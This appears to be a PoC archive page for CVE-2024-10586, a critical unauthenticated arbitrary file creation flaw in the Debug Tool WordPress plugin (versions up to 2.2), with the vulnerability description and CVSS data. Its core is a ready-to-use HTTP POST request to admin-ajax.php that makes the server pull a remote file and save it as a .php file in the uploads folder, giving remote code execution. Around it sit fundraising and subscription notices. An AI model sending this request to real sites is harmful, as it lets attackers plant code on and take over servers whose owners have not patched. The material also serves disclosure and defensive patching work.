Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-10586 PoC — Debug Tool <= 2.2 - Unauthenticated Arbitrary File Creation

Source
Associated Vulnerability
Title:Debug Tool <= 2.2 - Unauthenticated Arbitrary File Creation (CVE-2024-10586)
Description:The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to to create arbitrary files such as .php files that can be leveraged for remote code execution. CVE-2024-52416 may be a duplicate of this issue.
Description
Debug Tool <= 2.2 - Unauthenticated Arbitrary File Creation
Readme
# CVE-2024-10586
Debug Tool &lt;= 2.2 - Unauthenticated Arbitrary File Creation

# Description:
The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to to create arbitrary files such as .php files that can be leveraged for remote code execution.

```
CVE: CVE-2024-10586
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: debug-tool
```

POC
----

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/themes.php?page=themehunk-site-library&template=step
X-WP-Nonce: 47f8dbbb12
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 104
Origin: http://kubernetes.docker.internal
Connection: keep-alive

action=dbt_pull_image&source=http://rfi.nessus.org/rfi.txt&missed=/var/www/html/wp-content/uploads/t.php
```
File Snapshot

[4.0K] /data/pocs/c6dff7fa230bc938328458e705fcc5b6a7daa837 └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →